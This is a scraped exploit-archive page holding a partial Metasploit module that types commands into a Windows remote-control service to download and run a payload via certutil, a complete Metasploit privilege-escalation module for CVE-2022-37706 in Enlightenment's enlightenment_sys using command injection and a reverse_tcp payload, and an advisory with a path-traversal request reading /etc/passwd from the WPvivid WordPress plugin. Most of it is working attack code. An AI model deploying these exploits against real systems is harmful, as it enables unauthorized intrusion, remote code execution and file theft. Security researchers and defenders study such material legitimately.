datastore['PATH'].end_with? '\\'<br /><br /> "#{datastore['PATH']}\\"<br /> end<br /><br /> def key_value(key)<br /> characters = {<br /> 'A' => '8[ras]116', 'B' => '8[ras]119', 'C' => '8[ras]118', 'D' => '8[ras]113', 'E' => '8[ras]112',<br /> 'F' => '8[ras]115', 'G' => '8[ras]114', 'H' => '8[ras]125', 'I' => '8[ras]124', 'J' => '8[ras]127',<br /> 'K' => '8[ras]126', 'L' => '8[ras]121', 'M' => '8[ras]120', 'N' => '8[ras]123', 'O' => '8[ras]122',<br /> 'P' => '8[ras]101', 'Q' => '8[ras]100', 'R' => '8[ras]103', 'S' => '8[ras]102', 'T' => '7[ras]97',<br /> 'U' => '7[ras]96', 'V' => '7[ras]99', 'W' => '7[ras]98', 'X' => '8[ras]109', 'Y' => '8[ras]108',<br /> 'Z' => '8[ras]111',<br /><br /> 'a' => '7[ras]84', 'b' => '7[ras]87', 'c' => '7[ras]86', 'd' => '7[ras]81', 'e' => '7[ras]80',<br /> 'f' => '7[ras]83', 'g' => '7[ras]82', 'h' => '7[ras]93', 'i' => '7[ras]92', 'j' => '7[ras]95',<br /> 'k' => '7[ras]94', 'l' => '7[ras]89', 'm' => '7[ras]88', 'n' => '7[ras]91', 'o' => '7[ras]90',<br /> 'p' => '7[ras]69', 'q' => '7[ras]68', 'r' => '7[ras]71', 's' => '7[ras]70', 't' => '7[ras]65',<br /> 'u' => '7[ras]64', 'v' => '7[ras]67', 'w' => '7[ras]66', 'x' => '7[ras]77', 'y' => '7[ras]76',<br /> 'z' => '7[ras]79',<br /><br /> '1' => '6[ras]4', '2' => '6[ras]7', '3' => '6[ras]6', '4' => '6[ras]1', '5' => '6[ras]0',<br /> '6' => '6[ras]3', '7' => '6[ras]2', '8' => '7[ras]13', '9' => '7[ras]12', '0' => '6[ras]5',<br /><br /> "\n" => '3RTN', "\b" => '3BAS', ' ' => '7[ras]21',<br /><br /> '+' => '7[ras]30', '=' => '6[ras]8', '/' => '7[ras]26', '_' => '8[ras]106', '<' => '6[ras]9',<br /> '>' => '7[ras]11', '[' => '8[ras]110', ']' => '8[ras]104', '!' => '7[ras]20', '@' => '8[ras]117',<br /> '#' => '7[ras]22', '$' => '7[ras]17', '%' => '7[ras]16', '^' => '8[ras]107', '&' => '7[ras]19',<br /> '*' => '7[ras]31', '(' => '7[ras]29', ')' => '7[ras]28', '-' => '7[ras]24', "'" => '7[ras]18',<br /> '"' => '7[ras]23', ':' => '7[ras]15', ';' => '7[ras]14', '?' => '7[ras]10', '`' => '7[ras]85',<br /> '~' => '7[ras]75', '\\' => '8[ras]105', '|' => '7[ras]73', '{' => '7[ras]78', '}' => '7[ras]72',<br /> ',' => '7[ras]25', '.' => '7[ras]27'<br /> }<br /> "key #{characters[key]}"<br /> end<br /><br /> def windows_key<br /> 'key 3cmd'<br /> end<br /><br /> def check<br /> connect<br /> response = sock.get_once<br /> disconnect<br /> if response.include?('SIN 15win nop nop')<br /> splits = response.split(' ')<br /> return CheckCode::Appears("Received handshake with version: #{splits.last}")<br /> end<br /><br /> CheckCode::Unknown('Invalid response from target')<br /> end<br /><br /> def send_command(command)<br /> if command == windows_key<br /> sock.put(command)<br /> elsif (command == "\n") || (command == "\b") # dont split this up<br /> sock.put(key_value(c))<br /> else<br /> command.each_char do |c|<br /> sock.put(key_value(c))<br /> end<br /> sock.put(key_value("\n"))<br /> end<br /> sleep(datastore['SLEEP'])<br /> end<br /><br /> def on_request_uri(cli, _req)<br /> p = generate_payload_exe<br /> send_response(cli, p)<br /> print_good("Payload request received, sending #{p.length} bytes of payload for staging")<br /> end<br /><br /> def exploit<br /> connect<br /><br /> print_status('Connecting')<br /> print_status('Sending Windows key')<br /> send_command(windows_key)<br /><br /> print_status('Opening command prompt')<br /> send_command('cmd.exe')<br /> send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440<br /><br /> print_status('Sending stager')<br /> filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'<br /> register_file_for_cleanup("#{path}#{filename}")<br /> # I attempted to put this all in one, stage, run, exit, but it was never successful, so we'll keep it in 2<br /> stager = "certutil.exe -urlcache -f http://#{datastore['lhost']}:#{datastore['SRVPORT']}/ #{path}#{filename}"<br /> start_service('Path' => '/') # start webserver<br /> send_command(stager)<br /> send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440<br /><br /> print_status('Executing payload')<br /> send_command("#{path}#{filename} && exit")<br /> send_command('') # https://github.com/rapid7/metasploit-framework/pull/17067#discussion_r982670440<br /><br /> handler<br /> disconnect<br /> sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = GreatRanking<br /><br /> include Msf::Post::Linux::Priv<br /> include Msf::Post::File<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ubuntu Enlightenment Mount Priv Esc',<br /> 'Description' => %q{<br /> This module exploits a command injection within Enlightenment's<br /> enlightenment_sys binary. This is done by calling the mount<br /> command and feeding it paths which meet all of the system<br /> requirements, but execute a specific path as well due to a<br /> semi-colon being used.<br /> This module was tested on Ubuntu 22.04.1 X64 Desktop with<br /> enlightenment 0.25.3-1 (current at module write time)<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # msf module<br /> 'Maher Azzouzi' # discovery, poc<br /> ],<br /> 'Platform' => [ 'linux' ],<br /> 'Arch' => [ ARCH_X86, ARCH_X64 ],<br /> 'SessionTypes' => [ 'shell', 'meterpreter' ],<br /> 'Targets' => [[ 'Auto', {} ]],<br /> 'Privileged' => true,<br /> 'References' => [<br /> [ 'URL', 'https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit' ],<br /> [ 'URL', 'https://twitter.com/maherazz2/status/1569665311707734023' ],<br /> [ 'CVE', '2022-37706' ]<br /> ],<br /> 'DisclosureDate' => '2022-09-13',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'PrependFork' => true, # so we can exploit multiple times<br /> 'WfsDelay' => 10<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_advanced_options [<br /> OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])<br /> ]<br /> end<br /><br /> def base_dir<br /> datastore['WritableDir'].to_s<br /> end<br /><br /> def find_enlightenment_sys<br /> enlightenment_sys = '/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys'<br /> if file_exist?(enlightenment_sys)<br /> vprint_good("Found binary: #{enlightenment_sys}")<br /> if setuid?(enlightenment_sys)<br /> vprint_good("It's set for SUID")<br /> # at this time there doesn't seem to be any other way to check if it'll be exploitable<br /> # like a version number as a patch hasn't been released yet<br /> return enlightenment_sys<br /> else<br /> return nil<br /> end<br /> else<br /> vprint_status('Manually searching for exploitable binary')<br /> # https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh#L7<br /> binary = cmd_exec('find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1')<br /><br /> vprint_good("Found SUID binary: #{enlightenment_sys}") unless binary.nil?<br /> return binary<br /> end<br /> end<br /><br /> def check<br /> enlightenment_sys = find_enlightenment_sys<br /> return CheckCode::Safe('An exploitable enlightenment_sys was not found on the system') if enlightenment_sys.nil?<br /><br /> CheckCode::Appears<br /> end<br /><br /> def exploit<br /> # Check if we're already root<br /> if is_root? && !datastore['ForceExploit']<br /> fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'<br /> end<br /><br /> # Make sure we can write our exploit and payload to the local system<br /> unless writable? base_dir<br /> fail_with Failure::BadConfig, "#{base_dir} is not writable"<br /> end<br /><br /> print_status('Finding enlightenment_sys')<br /> enlightenment_sys = find_enlightenment_sys<br /> if enlightenment_sys.nil?<br /> fail_with Failure::NotFound, "#{base_dir} is not writable"<br /> end<br /><br /> # Upload payload executable<br /> payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"<br /> upload_and_chmodx payload_path, generate_payload_exe<br /> dev_path = "/dev/../tmp/;#{payload_path}"<br /> register_files_for_cleanup(payload_path)<br /><br /> print_status('Creating folders for exploit')<br /> cmd_exec('rm -rf /tmp/net; mkdir -p /tmp/net')<br /> cmd_exec("mkdir -p \"#{dev_path}\"")<br /> # Launch exploit with a timeout. We also have a vprint_status so if the user wants all the<br /> # output from the exploit being run, they can optionally see it<br /> enlightenment_sys = find_enlightenment_sys<br /> print_status 'Launching exploit...'<br /> cmd_exec("#{enlightenment_sys} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \"#{dev_path}\" /tmp///net", nil, datastore['WfsDelay'])<br /> end<br />end<br /></code></pre>
<pre><code>=====[ Tempest Security Intelligence - ADV-15/2022<br />]==========================<br /><br />Wordpress plugin - WPvivid Backup - Version < 0.9.76<br /><br />Author: Rodolfo Tavares<br /><br />Tempest Security Intelligence - Recife, Pernambuco - Brazil<br /><br />=====[ Table of Contents]==================================================<br /> * Overview<br /> * Detailed description<br /> * Timeline of disclosure<br /> * Thanks & Acknowledgements<br /> * References<br /><br />=====[ Vulnerability<br />Information]=============================================<br /> * Class: Improper Limitation of a Pathname to a Restricted Directory<br />('Path Traversal')<br /> ('Path Traversal') [CWE-22]<br /><br /> * CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H<br /> * CVSS Base Score 7.2<br /><br />=====[ Overview]========================================================<br /> * System affected : Wordpress plugin - WPvivid Backup<br /> * Software Version : Version < 0.9.76<br /> * Impacts : The plugin WPvivid Backup does not sanitise and validate a<br />parameter before using it to read the content of a file, allowing high<br />privilege users to read any file from the web server via a Traversal attack.<br /><br />=====[ Detailed<br />description]=================================================<br /> * Steps to reproduce<br /><br />1 - Authenticated as privilege user, copy the request below, change the<br />placeholder {{nonce}} with a valid nonce:<br /> ```<br /><br />https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922<br /> ```<br /><br />=====[ Timeline of<br />disclosure]===============================================<br /><br />11/Aug/2022 - Responsible disclosure was initiated with the vendor.<br />15/Aug/2022 - WPvivid Support confirmed the issue.<br />16/Aug/2022 - WPvivid Support fix the issue.<br />08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.<br /><br />=====[ Thanks & Acknowledgements]========================================<br /> * Tempest Security Intelligence [5]<br /><br />=====[ References ]=====================================================<br /><br />[1][ [<br />https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html<br />]]<br />[2][ [<br />https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a<br />[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]<br />[4][ [<br />https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]<br />]<br />[5][ [Thanks FXO,ACPM,MFPP]]<br /><br />=====[ EOF ]===========================================================<br />--<br /><br /></code></pre>